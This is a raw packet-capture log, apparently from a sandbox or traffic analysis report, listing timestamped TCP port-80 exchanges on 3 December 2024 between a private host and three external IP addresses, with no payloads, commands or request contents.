                                                                                                  Dec 3, 2024 09:52:48.658551931 CET8049949104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:48.658596039 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.658729076 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:48.998657942 CET4994980192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:50.015328884 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:50.117935896 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:50.118134022 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:50.123892069 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:50.226505041 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:50.849826097 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:50.849836111 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:50.850126028 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.434259892 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434324026 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434359074 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434499979 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434535980 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434566021 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434597015 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434613943 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.434628010 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434659004 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.434659958 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434715986 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434746027 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434777021 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.434783936 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.434881926 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.434927940 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.435045958 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.435089111 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.435193062 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.435226917 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.435256958 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.435286045 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.435316086 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.435436010 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.435482025 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.435954094 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436034918 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436065912 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436095953 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436126947 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436182976 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436258078 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.436305046 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.436402082 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.436887026 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436922073 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436952114 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.436983109 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.437012911 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.437047005 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.437069893 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.437115908 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.437309980 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.437709093 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.437743902 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.437772989 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.437824011 CET8049950104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:51.438092947 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:51.638767958 CET4995080192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:52.655148029 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:52.757997990 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:52.758244991 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:52.763207912 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:52.763256073 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:52.866050005 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:52.866091013 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:52.866121054 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:53.477863073 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:53.477905989 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:53.478060961 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.068690062 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068763018 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068820953 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068852901 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068881989 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068911076 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068941116 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068969965 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.068978071 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.068999052 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069030046 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069035053 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.069060087 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069091082 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069094896 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.069204092 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.069353104 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.069538116 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069586992 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069617033 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069645882 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069674969 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069704056 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.069808960 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.069866896 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.070400000 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.070461035 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.070492983 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.070522070 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.070552111 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.070583105 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.070641994 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.070765018 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.071369886 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.071425915 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.071459055 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.071490049 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.071521044 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.071551085 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.071616888 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.071693897 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.072336912 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.072376966 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.072407007 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.072434902 CET8049951104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:54.072655916 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:54.278928041 CET4995180192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:55.295559883 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:55.398047924 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:55.398206949 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:55.402111053 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:55.504731894 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.088455915 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.088494062 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.088849068 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.648533106 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648593903 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648622036 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648659945 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648778915 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648788929 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.648808002 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648833990 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648842096 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.648859024 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648897886 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648924112 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648948908 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.648973942 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649251938 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.649547100 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649580002 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649605989 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649631977 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649657011 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649682045 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.649728060 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.650011063 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.650369883 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.650417089 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.650468111 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.650556087 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.650583982 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.650609970 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.650664091 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.650712967 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.650859118 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.651365042 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.651412964 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.651452065 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.651477098 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.651504040 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.651529074 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.651545048 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.651778936 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.652215958 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.652283907 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.652311087 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.652337074 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.652360916 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.652386904 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.652504921 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.652766943 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.653057098 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.653105021 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.653146029 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.653172016 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.653197050 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.653223038 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.653285027 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.653407097 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.653955936 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.654129982 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.654160976 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:52:56.654381990 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.655214071 CET4995280192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:52:56.757745981 CET8049952104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:53:01.668622971 CET4995380192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:01.980004072 CET8049953103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:01.980170965 CET4995380192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:01.985338926 CET4995380192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:02.296662092 CET8049953103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:02.297339916 CET8049953103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:02.297449112 CET8049953103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:02.297622919 CET4995380192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:03.495481968 CET4995380192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:04.511946917 CET4995480192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:04.830336094 CET8049954103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:04.830535889 CET4995480192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:04.835143089 CET4995480192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:05.153386116 CET8049954103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:05.154117107 CET8049954103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:05.154164076 CET8049954103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:05.154288054 CET4995480192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:06.338613033 CET4995480192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:07.354909897 CET4995580192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:07.672378063 CET8049955103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:07.672602892 CET4995580192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:07.677383900 CET4995580192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:07.677459955 CET4995580192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:07.994851112 CET8049955103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:07.994891882 CET8049955103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:07.995491982 CET8049955103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:07.995537043 CET8049955103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:07.995647907 CET4995580192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:09.181598902 CET4995580192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:10.198028088 CET4995680192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:10.509737015 CET8049956103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:10.510016918 CET4995680192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:10.513726950 CET4995680192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:10.825611115 CET8049956103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:10.826478004 CET8049956103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:10.826524019 CET8049956103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:10.826771975 CET4995680192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:10.827769995 CET4995680192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:53:11.139357090 CET8049956103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:53:15.837460995 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.177185059 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.177442074 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.182495117 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.522226095 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.523864985 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.523925066 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.523969889 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524012089 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524055958 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524096966 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524101973 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.524132967 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524177074 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524219036 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524245977 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.524261951 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.524338961 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.524465084 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864034891 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864084959 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864120960 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864156961 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864192963 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864231110 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864267111 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864274025 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864303112 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864340067 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864373922 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864389896 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864408970 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864444971 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864453077 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864453077 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864481926 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864516973 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864551067 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864586115 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864619970 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864655018 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864690065 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864712954 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864726067 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:16.864765882 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864839077 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:16.864901066 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:17.204579115 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.204690933 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.204705000 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.204809904 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.204822063 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.204833031 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.204901934 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:17.204941034 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205065966 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205070019 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:17.205079079 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205090046 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205115080 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205126047 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205135107 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205144882 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205154896 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205164909 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205171108 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205178976 CET804995743.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:17.205224991 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:17.205306053 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:17.695612907 CET4995780192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:18.711854935 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.053751945 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.053941011 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.058984041 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.400574923 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402256966 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402376890 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402398109 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402414083 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402429104 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402442932 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402456045 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402471066 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402486086 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402499914 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.402594090 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.402621984 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.402720928 CET4995880192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:53:19.744196892 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744216919 CET804995843.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:53:19.744318962 CET804995843.156.176.253192.168.11.30
